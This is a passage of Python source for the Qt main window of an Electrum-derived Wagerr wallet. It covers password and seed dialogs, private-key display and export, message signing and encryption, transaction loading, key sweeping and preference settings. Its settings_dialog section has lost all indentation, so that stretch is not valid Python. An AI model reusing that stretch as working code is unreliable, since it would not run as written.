    self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog )
    sb.addPermanentWidget(self.password_button)
    sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog ) )
    self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog )
    sb.addPermanentWidget(self.seed_button)
    self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"), lambda: self.gui_object.show_network_dialog(self))
    sb.addPermanentWidget(self.status_button)
    run_hook('create_status_bar', sb)
    self.setStatusBar(sb)
def update_lock_icon(self):
    """Refresh the status-bar lock icon to match the wallet's password state."""
    if self.wallet.has_password():
        icon = read_QIcon("lock.png")
    else:
        icon = read_QIcon("unlock.png")
    self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
    """Show or hide seed/password/send buttons based on wallet capabilities."""
    wallet = self.wallet
    self.seed_button.setVisible(wallet.has_seed())
    self.password_button.setVisible(wallet.may_have_password())
    self.send_button.setVisible(not wallet.is_watching_only())
def change_password_dialog(self):
    """Let the user change (or disable) the wallet password.

    Wallets whose storage is encrypted with an xpub-derived key (hardware
    wallets) get a dedicated dialog — the "password" comes from the device,
    so the user is only asked whether to encrypt the file. Software wallets
    use the standard old/new password dialog.
    """
    from electrum.storage import STO_EV_XPUB_PW
    if self.wallet.get_available_storage_encryption_version() == STO_EV_XPUB_PW:
        from .password_dialog import ChangePasswordDialogForHW
        d = ChangePasswordDialogForHW(self, self.wallet)
        ok, encrypt_file = d.run()
        if not ok:
            return
        try:
            # derive the storage-encryption password from the device
            hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
        except UserCancelled:
            return
        except BaseException as e:
            self.logger.exception('')
            self.show_error(str(e))
            return
        # old password only applies if the wallet currently has one;
        # new password only applies if the user chose encryption
        old_password = hw_dev_pw if self.wallet.has_password() else None
        new_password = hw_dev_pw if encrypt_file else None
    else:
        from .password_dialog import ChangePasswordDialogForSW
        d = ChangePasswordDialogForSW(self, self.wallet)
        ok, old_password, new_password, encrypt_file = d.run()
        if not ok:
            return
    try:
        self.wallet.update_password(old_password, new_password, encrypt_file)
    except InvalidPassword as e:
        self.show_error(str(e))
        return
    except BaseException:
        self.logger.exception('Failed to update password')
        self.show_error(_('Failed to update password'))
        return
    msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
    self.show_message(msg, title=_("Success"))
    self.update_lock_icon()
def toggle_search(self):
    """Toggle the status-bar search box; clear the filter when hiding it.

    The previous version fetched the current tab into an unused local and
    carried commented-out dead code; both removed.
    """
    self.search_box.setHidden(not self.search_box.isHidden())
    if not self.search_box.isHidden():
        # box just became visible: give it keyboard focus so the user
        # can start typing immediately
        self.search_box.setFocus(1)
    else:
        # box just hid: reset any active filter on the current tab
        self.do_search('')
def do_search(self, t):
    """Apply filter text *t* to the current tab's list, if it supports search."""
    current_tab = self.tabs.currentWidget()
    searchable = getattr(current_tab, 'searchable_list', None)
    if searchable is not None:
        searchable.filter(t)
def new_contact_dialog(self):
    """Show a modal dialog asking for an address/name pair and store it as
    a new contact."""
    d = WindowModalDialog(self, _("New Contact"))
    vbox = QVBoxLayout(d)
    vbox.addWidget(QLabel(_('New Contact') + ':'))
    grid = QGridLayout()
    line1 = QLineEdit()  # contact address
    line1.setFixedWidth(32 * char_width_in_lineedit())
    line2 = QLineEdit()  # contact display name
    line2.setFixedWidth(32 * char_width_in_lineedit())
    grid.addWidget(QLabel(_("Address")), 1, 0)
    grid.addWidget(line1, 1, 1)
    grid.addWidget(QLabel(_("Name")), 2, 0)
    grid.addWidget(line2, 2, 1)
    vbox.addLayout(grid)
    vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
    if d.exec_():
        # set_contact takes (name, address)
        self.set_contact(line2.text(), line1.text())
def show_master_public_keys(self):
    """Show the "Wallet Information" dialog: file name, wallet type, script
    type, seed availability, keystore type and master public key(s)."""
    dialog = WindowModalDialog(self, _("Wallet Information"))
    dialog.setMinimumSize(500, 100)
    mpk_list = self.wallet.get_master_public_keys()
    vbox = QVBoxLayout()
    wallet_type = self.wallet.storage.get('wallet_type', '')
    if self.wallet.is_watching_only():
        wallet_type += ' [{}]'.format(_('watching-only'))
    seed_available = _('True') if self.wallet.has_seed() else _('False')
    keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()]
    grid = QGridLayout()
    basename = os.path.basename(self.wallet.storage.path)
    grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
    grid.addWidget(QLabel(basename), 0, 1)
    grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
    grid.addWidget(QLabel(wallet_type), 1, 1)
    grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
    grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
    grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0)
    grid.addWidget(QLabel(str(seed_available)), 3, 1)
    # single keystore: show its type inline; multisig shows types per cosigner
    if len(keystore_types) <= 1:
        grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0)
        ks_type = str(keystore_types[0]) if keystore_types else _('No keystore')
        grid.addWidget(QLabel(ks_type), 4, 1)
    vbox.addLayout(grid)
    if self.wallet.is_deterministic():
        mpk_text = ShowQRTextEdit()
        mpk_text.setMaximumHeight(150)
        mpk_text.addCopyButton(self.app)
        def show_mpk(index):
            # display the master public key for the selected cosigner
            mpk_text.setText(mpk_list[index])
            mpk_text.repaint()  # macOS hack for #4777
        # only show the combobox in case multiple accounts are available
        if len(mpk_list) > 1:
            def label(key):
                if isinstance(self.wallet, Multisig_Wallet):
                    return _("cosigner") + f' {key+1} ( keystore: {keystore_types[key]} )'
                return ''
            labels = [label(i) for i in range(len(mpk_list))]
            on_click = lambda clayout: show_mpk(clayout.selected_index())
            labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
            vbox.addLayout(labels_clayout.layout())
        else:
            vbox.addWidget(QLabel(_("Master Public Key")))
        show_mpk(0)
        vbox.addWidget(mpk_text)
    vbox.addStretch(1)
    vbox.addLayout(Buttons(CloseButton(dialog)))
    dialog.setLayout(vbox)
    dialog.exec_()
def remove_wallet(self):
    """Ask for confirmation, then delete the wallet file from disk."""
    prompt = '\n'.join([
        _('Delete wallet file?'),
        "%s" % self.wallet.storage.path,
        _('If your wallet contains funds, make sure you have saved its seed.'),
    ])
    if self.question(prompt):
        self._delete_wallet()
@protected
def _delete_wallet(self, password):
    """Delete the wallet file via the daemon, then close this window."""
    wallet_path = self.wallet.storage.path
    basename = os.path.basename(wallet_path)
    removed = self.gui_object.daemon.delete_wallet(wallet_path)
    self.close()
    if removed:
        self.show_error(_("Wallet removed: {}").format(basename))
    else:
        self.show_error(_("Wallet file not found: {}").format(basename))
@protected
def show_seed_dialog(self, password):
    """Display the wallet seed (and passphrase) after password entry."""
    if not self.wallet.has_seed():
        self.show_message(_('This wallet has no seed'))
        return
    ks = self.wallet.get_keystore()
    try:
        seed = ks.get_seed(password)
        passphrase = ks.get_passphrase(password)
    except BaseException as e:
        self.show_error(str(e))
        return
    from .seed_dialog import SeedDialog
    dialog = SeedDialog(self, seed, passphrase)
    dialog.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
    """Show *data* as a QR code in a modal dialog; no-op on empty data."""
    if not data:
        return
    dialog = QRDialog(data, parent or self, title)
    dialog.exec_()
@protected
def show_private_key(self, address, password):
    """Show a dialog with the private key (and redeem script, if any) for
    *address*, after unlocking with *password*."""
    if not address:
        return
    try:
        pk, redeem_script = self.wallet.export_private_key(address, password)
    except Exception as e:
        self.logger.exception('')
        self.show_message(str(e))
        return
    # the script type is encoded in the serialized private key
    xtype = bitcoin.deserialize_privkey(pk)[0]
    d = WindowModalDialog(self, _("Private key"))
    d.setMinimumSize(600, 150)
    vbox = QVBoxLayout()
    vbox.addWidget(QLabel(_("Address") + ': ' + address))
    vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
    vbox.addWidget(QLabel(_("Private key") + ':'))
    keys_e = ShowQRTextEdit(text=pk)
    keys_e.addCopyButton(self.app)
    vbox.addWidget(keys_e)
    if redeem_script:
        vbox.addWidget(QLabel(_("Redeem Script") + ':'))
        rds_e = ShowQRTextEdit(text=redeem_script)
        rds_e.addCopyButton(self.app)
        vbox.addWidget(rds_e)
    vbox.addLayout(Buttons(CloseButton(d)))
    d.setLayout(vbox)
    d.exec_()
# Shown by do_sign/do_verify when the entered address type does not have a
# unique public key (so message signing/verification is undefined).
msg_sign = _("Signing with an address actually means signing with the corresponding "
             "private key, and verifying with the corresponding public key. The "
             "address you have entered does not have a unique public key, so these "
             "operations cannot be performed.") + '\n\n' + \
           _('The operation is undefined. Not just in Electrum, but in general.')
@protected
def do_sign(self, address, message, signature, password):
    """Sign the message widget's text with the key for *address*; the
    base64 signature is written into the *signature* widget once the
    background task completes."""
    address = address.text().strip()
    message = message.toPlainText().strip()
    if not bitcoin.is_address(address):
        self.show_message(_('Invalid Wagerr address.'))
        return
    if self.wallet.is_watching_only():
        self.show_message(_('This is a watching-only wallet.'))
        return
    if not self.wallet.is_mine(address):
        self.show_message(_('Address not in wallet.'))
        return
    txin_type = self.wallet.get_txin_type(address)
    # only single-key address types yield a well-defined message signature
    if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
        self.show_message(_('Cannot sign messages with this type of address:') + \
                          ' ' + txin_type + '\n\n' + self.msg_sign)
        return
    # run on the wallet thread so the GUI stays responsive
    task = partial(self.wallet.sign_message, address, message, password)
    def show_signed_message(sig):
        try:
            signature.setText(base64.b64encode(sig).decode('ascii'))
        except RuntimeError:
            # (signature) wrapped C/C++ object has been deleted
            pass
    self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
    """Verify a signed message against a Wagerr address and report the result."""
    address = address.text().strip()
    message = message.toPlainText().strip().encode('utf-8')
    if not bitcoin.is_address(address):
        self.show_message(_('Invalid Wagerr address.'))
        return
    verified = False
    try:
        # b64decode raises on malformed input; treat that as "not verified"
        sig = base64.b64decode(str(signature.toPlainText()))
        verified = ecc.verify_message_with_address(address, sig, message)
    except Exception:
        verified = False
    if verified:
        self.show_message(_("Signature verified"))
    else:
        self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
    """Open the Sign/verify Message dialog, optionally pre-filled with
    *address*."""
    d = WindowModalDialog(self, _('Sign/verify Message'))
    d.setMinimumSize(610, 290)
    layout = QGridLayout(d)
    message_e = QTextEdit()
    message_e.setAcceptRichText(False)
    layout.addWidget(QLabel(_('Message')), 1, 0)
    layout.addWidget(message_e, 1, 1)
    layout.setRowStretch(2,3)
    address_e = QLineEdit()
    address_e.setText(address)
    layout.addWidget(QLabel(_('Address')), 2, 0)
    layout.addWidget(address_e, 2, 1)
    signature_e = QTextEdit()
    signature_e.setAcceptRichText(False)
    layout.addWidget(QLabel(_('Signature')), 3, 0)
    layout.addWidget(signature_e, 3, 1)
    layout.setRowStretch(3,1)
    hbox = QHBoxLayout()
    # the handlers receive the widgets and read their current text themselves
    b = QPushButton(_("Sign"))
    b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
    hbox.addWidget(b)
    b = QPushButton(_("Verify"))
    b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
    hbox.addWidget(b)
    b = QPushButton(_("Close"))
    b.clicked.connect(d.accept)
    hbox.addWidget(b)
    layout.addLayout(hbox, 4, 1)
    d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
    """Decrypt the ciphertext widget's text with the wallet key for the
    given public key; the plaintext is shown asynchronously."""
    if self.wallet.is_watching_only():
        self.show_message(_('This is a watching-only wallet.'))
        return
    ciphertext = encrypted_e.toPlainText()
    task = partial(self.wallet.decrypt_message, pubkey_e.text(), ciphertext, password)
    def on_decrypted(text):
        try:
            message_e.setText(text.decode('utf-8'))
        except RuntimeError:
            # the target Qt widget may already have been destroyed
            pass
    self.wallet.thread.add(task, on_success=on_decrypted)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
    """Encrypt the message widget's text to the given public key and show
    the result in the encrypted widget."""
    plaintext = message_e.toPlainText().encode('utf-8')
    try:
        public_key = ecc.ECPubkey(bfh(pubkey_e.text()))
    except BaseException:
        self.logger.exception('Invalid Public key')
        self.show_warning(_('Invalid Public key'))
        return
    ciphertext = public_key.encrypt_message(plaintext)
    encrypted_e.setText(ciphertext.decode('ascii'))
def encrypt_message(self, address=''):
    """Open the Encrypt/decrypt Message dialog, optionally pre-filling the
    public key looked up from *address*."""
    d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
    d.setMinimumSize(610, 490)
    layout = QGridLayout(d)
    message_e = QTextEdit()
    message_e.setAcceptRichText(False)
    layout.addWidget(QLabel(_('Message')), 1, 0)
    layout.addWidget(message_e, 1, 1)
    layout.setRowStretch(2,3)
    pubkey_e = QLineEdit()
    if address:
        # pre-fill with the wallet's public key for this address
        pubkey = self.wallet.get_public_key(address)
        pubkey_e.setText(pubkey)
    layout.addWidget(QLabel(_('Public key')), 2, 0)
    layout.addWidget(pubkey_e, 2, 1)
    encrypted_e = QTextEdit()
    encrypted_e.setAcceptRichText(False)
    layout.addWidget(QLabel(_('Encrypted')), 3, 0)
    layout.addWidget(encrypted_e, 3, 1)
    layout.setRowStretch(3,1)
    hbox = QHBoxLayout()
    b = QPushButton(_("Encrypt"))
    b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
    hbox.addWidget(b)
    b = QPushButton(_("Decrypt"))
    b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
    hbox.addWidget(b)
    b = QPushButton(_("Close"))
    b.clicked.connect(d.accept)
    hbox.addWidget(b)
    layout.addLayout(hbox, 4, 1)
    d.exec_()
def password_dialog(self, msg=None, parent=None):
    """Prompt for a password; return it, or None if the user cancelled."""
    from .password_dialog import PasswordDialog
    dialog = PasswordDialog(parent or self, msg)
    return dialog.run()
def tx_from_text(self, txt):
    """Parse raw transaction text into a Transaction; show an error and
    return None on failure."""
    from electrum.transaction import tx_from_str
    try:
        return Transaction(tx_from_str(txt))
    except BaseException as e:
        self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + str(e))
        return
def read_tx_from_qrcode(self):
    """Scan a QR code with the configured camera and dispatch it: either a
    wagerr: payment URI, or a base43-encoded raw transaction."""
    from electrum import qrscanner
    try:
        data = qrscanner.scan_barcode(self.config.get_video_device())
    except BaseException as e:
        self.show_error(str(e))
        return
    if not data:
        return
    # if the user scanned a bitcoin URI
    if str(data).startswith("wagerr:"):
        self.pay_to_URI(data)
        return
    # else if the user scanned an offline signed tx
    try:
        # QR transaction payloads are base43-encoded; convert to hex
        data = bh2u(bitcoin.base_decode(data, length=None, base=43))
    except BaseException as e:
        self.show_error((_('Could not decode QR code')+':\n{}').format(repr(e)))
        return
    tx = self.tx_from_text(data)
    if not tx:
        return
    self.show_transaction(tx)
def read_tx_from_file(self):
    """Ask the user for a .txn file and parse its contents into a
    transaction; return None on cancel or read failure."""
    path = self.getOpenFileName(_("Select your transaction file"), "*.txn")
    if not path:
        return
    try:
        with open(path, "r") as f:
            contents = f.read()
    except (ValueError, IOError, os.error) as reason:
        self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason),
                           title=_("Unable to read file or no transaction found"))
        return
    return self.tx_from_text(contents)
def do_process_from_text(self):
    """Load a raw transaction pasted as text and show it."""
    text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
    if text:
        tx = self.tx_from_text(text)
        if tx:
            self.show_transaction(tx)
def do_process_from_file(self):
    """Load a transaction from a file and show it."""
    tx = self.read_tx_from_file()
    if not tx:
        return
    self.show_transaction(tx)
def do_process_from_txid(self):
    """Fetch a transaction by txid from the network and show it."""
    from electrum import transaction
    txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
    if not (ok and txid):
        return
    txid = str(txid).strip()
    try:
        raw_tx = self.network.run_from_another_thread(
            self.network.get_transaction(txid, timeout=10))
    except Exception as e:
        self.show_message(_("Error getting transaction from network") + ":\n" + str(e))
        return
    self.show_transaction(transaction.Transaction(raw_tx))
@protected
def export_privkeys_dialog(self, password):
    """Export all wallet private keys to a CSV or JSON file.

    Keys are derived one-by-one on a background thread while the dialog
    shows progress; the actual file export only happens after the user
    confirms with the Export button (enabled once derivation finishes).
    """
    if self.wallet.is_watching_only():
        self.show_message(_("This is a watching-only wallet"))
        return
    if isinstance(self.wallet, Multisig_Wallet):
        self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
                          _('It cannot be "backed up" by simply exporting these private keys.'))
    d = WindowModalDialog(self, _('Private keys'))
    d.setMinimumSize(980, 300)
    vbox = QVBoxLayout(d)
    msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
                          _("Exposing a single private key can compromise your entire wallet!"),
                          _("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
    vbox.addWidget(QLabel(msg))
    e = QTextEdit()
    e.setReadOnly(True)
    vbox.addWidget(e)
    defaultname = 'electrum-private-keys.csv'
    select_msg = _('Select file to export your private keys to')
    hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
    vbox.addLayout(hbox)
    b = OkButton(d, _('Export'))
    # disabled until all keys have been derived (see show_privkeys)
    b.setEnabled(False)
    vbox.addLayout(Buttons(CancelButton(d), b))
    private_keys = {}
    addresses = self.wallet.get_addresses()
    done = False
    cancelled = False
    def privkeys_thread():
        # background worker: derive one key per address, emitting a
        # progress signal after each; stops when done/cancelled is set
        for addr in addresses:
            time.sleep(0.1)
            if done or cancelled:
                break
            privkey = self.wallet.export_private_key(addr, password)[0]
            private_keys[addr] = privkey
            self.computing_privkeys_signal.emit()
        if not cancelled:
            self.computing_privkeys_signal.disconnect()
            self.show_privkeys_signal.emit()
    def show_privkeys():
        # runs on the GUI thread once all keys are available
        s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
        e.setText(s)
        b.setEnabled(True)
        self.show_privkeys_signal.disconnect()
        nonlocal done
        done = True
    def on_dialog_closed(*args):
        nonlocal done
        nonlocal cancelled
        if not done:
            # dialog closed before derivation finished: stop the worker
            # and detach both signals
            cancelled = True
            self.computing_privkeys_signal.disconnect()
            self.show_privkeys_signal.disconnect()
    self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
    self.show_privkeys_signal.connect(show_privkeys)
    d.finished.connect(on_dialog_closed)
    threading.Thread(target=privkeys_thread).start()
    if not d.exec_():
        done = True
        return
    filename = filename_e.text()
    if not filename:
        return
    try:
        self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
    except (IOError, os.error) as reason:
        txt = "\n".join([
            _("Electrum was unable to produce a private key-export."),
            str(reason)
        ])
        self.show_critical(txt, title=_("Unable to create csv"))
    except Exception as e:
        self.show_message(str(e))
        return
    self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
    """Write the address -> private key mapping *pklist* to *fileName*.

    If *is_csv* is true, write a two-column CSV with a header row;
    otherwise dump the mapping as indented JSON.
    """
    # newline='' is required by the csv module so csv.writer controls the
    # line endings itself; without it every row is followed by a blank
    # line on Windows. It is harmless for the JSON branch.
    with open(fileName, "w+", newline='') as f:
        if is_csv:
            transaction = csv.writer(f)
            transaction.writerow(["address", "private_key"])
            for addr, pk in pklist.items():
                # addresses are right-aligned to a 34-char column
                transaction.writerow(["%34s"%addr,pk])
        else:
            f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
    """Import wallet labels from a user-selected file."""
    def import_labels(path):
        def _validate(data):
            # TODO: validate the shape of the imported data
            return data
        def _assign(data):
            for key, value in data.items():
                self.wallet.set_label(key, value)
        import_meta(path, _validate, _assign)
    def on_import():
        self.need_update.set()
    import_meta_gui(self, _('labels'), import_labels, on_import)
def do_export_labels(self):
    """Export wallet labels to a user-selected file."""
    export_meta_gui(self, _('labels'),
                    lambda filename: export_meta(self.wallet.labels, filename))
def sweep_key_dialog(self):
    """Sweep funds from externally-supplied private keys: collect the keys
    and a destination address, then prefill and freeze the Send tab."""
    d = WindowModalDialog(self, title=_('Sweep private keys'))
    d.setMinimumSize(600, 300)
    vbox = QVBoxLayout(d)
    hbox_top = QHBoxLayout()
    hbox_top.addWidget(QLabel(_("Enter private keys:")))
    hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
    vbox.addLayout(hbox_top)
    keys_e = ScanQRTextEdit(allow_multi=True)
    keys_e.setTabChangesFocus(True)
    vbox.addWidget(keys_e)
    # destination candidates: prefer unused addresses, fall back to
    # receiving addresses, then any address
    addresses = self.wallet.get_unused_addresses()
    if not addresses:
        try:
            addresses = self.wallet.get_receiving_addresses()
        except AttributeError:
            addresses = self.wallet.get_addresses()
    h, address_e = address_field(addresses)
    vbox.addLayout(h)
    vbox.addStretch(1)
    button = OkButton(d, _('Sweep'))
    vbox.addLayout(Buttons(CancelButton(d), button))
    button.setEnabled(False)
    def get_address():
        # return the destination address, or None if invalid
        addr = str(address_e.text()).strip()
        if bitcoin.is_address(addr):
            return addr
    def get_pk(*, raise_on_error=False):
        # parse the pasted text into a list of private keys
        text = str(keys_e.toPlainText())
        return keystore.get_private_keys(text, raise_on_error=raise_on_error)
    def on_edit():
        # enable the Sweep button only when both fields validate
        valid_privkeys = False
        try:
            valid_privkeys = get_pk(raise_on_error=True) is not None
        except Exception as e:
            button.setToolTip(f'{_("Error")}: {str(e)}')
        else:
            button.setToolTip('')
        button.setEnabled(get_address() is not None and valid_privkeys)
    on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
    keys_e.textChanged.connect(on_edit)
    address_e.textChanged.connect(on_edit)
    address_e.textChanged.connect(on_address)
    on_address(str(address_e.text()))
    if not d.exec_():
        return
    # user pressed "sweep"
    addr = get_address()
    try:
        self.wallet.check_address(addr)
    except InternalAddressCorruption as e:
        self.show_error(str(e))
        raise
    try:
        coins, keypairs = sweep_preparations(get_pk(), self.network)
    except Exception as e:  # FIXME too broad...
        self.show_message(str(e))
        return
    # prefill the Send tab with the swept coins and freeze the fields
    self.do_clear()
    self.tx_external_keypairs = keypairs
    self.spend_coins(coins)
    self.payto_e.setText(addr)
    self.spend_max()
    self.payto_e.setFrozen(True)
    self.amount_e.setFrozen(True)
    self.warn_if_watching_only()
def _do_import(self, title, header_layout, func):
    """Prompt for whitespace-separated entries, pass them to *func*, and
    report which were accepted/rejected; then refresh the list views."""
    text = text_dialog(self, title, header_layout, _('Import'), allow_multi=True)
    if not text:
        return
    entries = str(text).split()
    good_inputs, bad_inputs = func(entries)
    if good_inputs:
        msg = '\n'.join(good_inputs[:10])
        if len(good_inputs) > 10:
            msg += '\n...'
        self.show_message(_("The following addresses were added")
                          + f' ({len(good_inputs)}):\n' + msg)
    if bad_inputs:
        msg = "\n".join(f"{key[:10]}... ({err})" for key, err in bad_inputs[:10])
        if len(bad_inputs) > 10:
            msg += '\n...'
        self.show_error(_("The following inputs could not be imported")
                        + f' ({len(bad_inputs)}):\n' + msg)
    for view in (self.address_list, self.history_list,
                 self.betting_history_list, self.dice_history_list):
        view.update()
def import_addresses(self):
    """Import watch-only addresses into the wallet, if it supports that."""
    if not self.wallet.can_import_address():
        return
    self._do_import(_('Import addresses'), _("Enter addresses") + ':',
                    self.wallet.import_addresses)
@protected
def do_import_privkey(self, password):
    """Import private keys into the wallet, if it supports that."""
    if not self.wallet.can_import_privkey():
        return
    header = QHBoxLayout()
    header.addWidget(QLabel(_("Enter private keys") + ':'))
    header.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
    self._do_import(_('Import private keys'), header,
                    lambda keys: self.wallet.import_private_keys(keys, password))
def update_fiat(self):
    """Show/hide fiat fields and refresh views after FX settings change."""
    visible = self.fx and self.fx.is_enabled()
    self.fiat_send_e.setVisible(visible)
    self.fiat_receive_e.setVisible(visible)
    for view in (self.history_list, self.betting_history_list,
                 self.dice_history_list):
        view.update()
    self.address_list.refresh_headers()
    self.address_list.update()
    self.update_status()
def settings_dialog(self):
self.need_restart = False
d = WindowModalDialog(self, _('Preferences'))
vbox = QVBoxLayout()
tabs = QTabWidget()
gui_widgets = []
fee_widgets = []
tx_widgets = []
id_widgets = []
# language
lang_help = _('Select which language is used in the GUI (after restart).')
lang_label = HelpLabel(_('Language') + ':', lang_help)
lang_combo = QComboBox()
from electrum.i18n import languages
lang_combo.addItems(list(languages.values()))
lang_keys = list(languages.keys())
lang_cur_setting = self.config.get("language", '')
try:
index = lang_keys.index(lang_cur_setting)
except ValueError: # not in list
index = 0
lang_combo.setCurrentIndex(index)
if not self.config.is_modifiable('language'):
for w in [lang_combo, lang_label]: w.setEnabled(False)
def on_lang(x):
lang_request = list(languages.keys())[lang_combo.currentIndex()]
if lang_request != self.config.get('language'):
self.config.set_key("language", lang_request, True)
self.need_restart = True
lang_combo.currentIndexChanged.connect(on_lang)
gui_widgets.append((lang_label, lang_combo))
nz_help = _('Number of zeros displayed after the decimal point. For example, if this is set to 2, "1." will be displayed as "1.00"')
nz_label = HelpLabel(_('Zeros after decimal point') + ':', nz_help)
nz = QSpinBox()
nz.setMinimum(0)
nz.setMaximum(self.decimal_point)
nz.setValue(self.num_zeros)
if not self.config.is_modifiable('num_zeros'):
for w in [nz, nz_label]: w.setEnabled(False)
def on_nz():
value = nz.value()
if self.num_zeros != value:
self.num_zeros = value
self.config.set_key('num_zeros', value, True)
self.history_list.update()
self.betting_history_list.update()
self.dice_history_list.update()
self.address_list.update()
nz.valueChanged.connect(on_nz)
gui_widgets.append((nz_label, nz))
msg = '\n'.join([
_('Time based: fee rate is based on average confirmation time estimates'),
_('Mempool based: fee rate is targeting a depth in the memory pool')
]
)
fee_type_label = HelpLabel(_('Fee estimation') + ':', msg)
fee_type_combo = QComboBox()
fee_type_combo.addItems([_('Static'), _('ETA'), _('Mempool')])
fee_type_combo.setCurrentIndex((2 if self.config.use_mempool_fees() else 1) if self.config.is_dynfee() else 0)
def on_fee_type(x):
self.config.set_key('mempool_fees', x==2)
self.config.set_key('dynamic_fees', x>0)
self.fee_slider.update()
fee_type_combo.currentIndexChanged.connect(on_fee_type)
fee_widgets.append((fee_type_label, fee_type_combo))
feebox_cb = QCheckBox(_('Edit fees manually'))
feebox_cb.setChecked(self.config.get('show_fee', False))
feebox_cb.setToolTip(_("Show fee edit box in send tab."))
def on_feebox(x):
self.config.set_key('show_fee', x == Qt.Checked)
self.fee_adv_controls.setVisible(bool(x))
feebox_cb.stateChanged.connect(on_feebox)
fee_widgets.append((feebox_cb, None))
use_rbf = self.config.get('use_rbf', True)
use_rbf_cb = QCheckBox(_('Use Replace-By-Fee'))
use_rbf_cb.setChecked(use_rbf)
use_rbf_cb.setToolTip(
_('If you check this box, your transactions will be marked as non-final,') + '\n' + \
_('and you will have the possibility, while they are unconfirmed, to replace them with transactions that pay higher fees.') + '\n' + \
_('Note that some merchants do not accept non-final transactions until they are confirmed.'))
def on_use_rbf(x):
self.config.set_key('use_rbf', bool(x))
batch_rbf_cb.setEnabled(bool(x))
use_rbf_cb.stateChanged.connect(on_use_rbf)
fee_widgets.append((use_rbf_cb, None))
batch_rbf_cb = QCheckBox(_('Batch RBF transactions'))
batch_rbf_cb.setChecked(self.config.get('batch_rbf', False))
batch_rbf_cb.setEnabled(use_rbf)
batch_rbf_cb.setToolTip(
_('If you check this box, your unconfirmed transactions will be consolidated into a single transaction.') + '\n' + \
_('This will save fees.'))
def on_batch_rbf(x):
self.config.set_key('batch_rbf', bool(x))
batch_rbf_cb.stateChanged.connect(on_batch_rbf)
fee_widgets.append((batch_rbf_cb, None))
msg = _('OpenAlias record, used to receive coins and to sign payment requests.') + '\n\n'\
+ _('The following alias providers are available:') + '\n'\
+ '\n'.join(['https://cryptoname.co/', 'http://xmr.link']) + '\n\n'\
+ 'For more information, see https://openalias.org'
alias_label = HelpLabel(_('OpenAlias') + ':', msg)
alias = self.config.get('alias','')
alias_e = QLineEdit(alias)
def set_alias_color():
if not self.config.get('alias'):
alias_e.setStyleSheet("")
return
if self.alias_info:
alias_addr, alias_name, validated = self.alias_info
alias_e.setStyleSheet((ColorScheme.GREEN if validated else ColorScheme.RED).as_stylesheet(True))
else:
alias_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
def on_alias_edit():
alias_e.setStyleSheet("")
alias = str(alias_e.text())
self.config.set_key('alias', alias, True)
if alias:
self.fetch_alias()
set_alias_color()
self.alias_received_signal.connect(set_alias_color)
alias_e.editingFinished.connect(on_alias_edit)
id_widgets.append((alias_label, alias_e))
# SSL certificate
msg = ' '.join([
_('SSL certificate used to sign payment requests.'),
_('Use setconfig to set ssl_chain and ssl_privkey.'),
])
if self.config.get('ssl_privkey') or self.config.get('ssl_chain'):
try:
SSL_identity = paymentrequest.check_ssl_config(self.config)
SSL_error = None
except BaseException as e:
SSL_identity = "error"
SSL_error = str(e)
else:
SSL_identity = ""
SSL_error = None
SSL_id_label = HelpLabel(_('SSL certificate') + ':', msg)
SSL_id_e = QLineEdit(SSL_identity)
SSL_id_e.setStyleSheet((ColorScheme.RED if SSL_error else ColorScheme.GREEN).as_stylesheet(True) if SSL_identity else '')
if SSL_error:
SSL_id_e.setToolTip(SSL_error)
SSL_id_e.setReadOnly(True)
id_widgets.append((SSL_id_label, SSL_id_e))
units = base_units_list()
msg = (_('Base unit of your wallet.')
+ '\n1 {} = 1000 m{}.\n'.format(constants.net.SYMBOL,constants.net.SYMBOL)
+ _('This setting affects the Send tab, and all balance related fields.'))
